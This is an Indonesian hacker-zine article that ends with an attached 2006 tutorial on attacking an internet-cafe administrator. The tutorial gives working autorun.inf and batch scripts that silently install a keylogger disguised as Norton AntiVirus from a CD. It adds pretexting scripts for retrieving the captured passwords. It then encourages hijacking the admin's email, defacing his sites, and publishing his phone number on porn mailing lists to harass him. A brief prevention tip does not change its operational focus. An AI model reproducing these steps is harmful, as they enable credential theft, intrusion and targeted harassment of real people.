Google Code Search. Ancaman baru mulai timbul, "si pintar" ini kini dapat
meng-crawl hingga kepada archive file yang berada di public directory web
server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di
dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang
kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar
situs anda bisa hidup lebih lama. Kalo nggak... yach.. tunggu ajah ada orang
yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi... maka bersiaplah.. "taman
bermain" anda akan diambil alih olehnya..
0 [0XFFFF000] Penutup
Wew... ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu
berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada
di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun
yang meminjam komputer anda memiliki tujuan yang kurang baik.
Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda :)
0 [0XFFFFF00] Referensi
- securityfocus[dot]com
- phrack[dot]org
- spyrozone[dot]tk
- google[dot]com
0 [0XFFFFFF0] Shoutz:
- Vindika Anastasya & Vermouth Anastasya.. The deepest Love I'v ever had.. :)
- All Crack Sky Staff! Hey there.. :)
- ECHOERS, SECTOR-S (wake up guys!!)
- EVILratE, PushMOV, MyzTX, Dr3, Lun4, Clust3r, RX-259, RX-290, RX-313, RX-147
- Mr.Rio, PramayunTA, Alfian, Andien, Taurista, Bachtiar, EQ, WisNU, Arman,
Dani, Rara, Icha, Prita, Vivi, Nabiel, Tika, Kemas, Bomy, Arbi, Tunjung,
Krishna, Rizki..
- All my friend in SMAN 2 SIDOARJO
- All member of www.spyrozone.net .. stay Alert in SPYRO ZONE!!
0 [0XFFFFFFF] Attachment:
Berikut adalah contoh social engineering sederhana. Saya ambil dari tulisan
saya yang berjudul "Pembalasan Untuk Sang Admin"-www.spyrozone.net. Enjoy... ;)
----------------------------------
Pembalasan Untuk Sang Admin - SOcial Engineering
May 12, 2006 jam 21:16 malam di depan RedHat tercinta dengan segelas Heineken
Author: SPYRO KiD
CopyLeft (c) 2006 by www.spyrozone.net
|---[Table of Contents
1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
1. Introduction
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi
"rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.
2. Serangan pertama
Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:
---[1 Bukalah Notepad kemudian ketik baris script berikut:
[autorun]
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].
---[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].
---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.
---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf
akan memproses file nav.bat ---> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.
Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.
Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya... heheh... DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs - situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya
jika milis tersebut berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan menjerit - jerit
dengan jeritan indah :D
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.
Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!
6. Penutup
---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana
namun dampaknya.. bisa anda bayangkan sendiri ;)
Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan hasilnya saya
berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi untuk
penerapan "PEMBALASAN" tentu saya tidak melakukan hal sekejam itu ;P
Label: pengetahuan teknologi


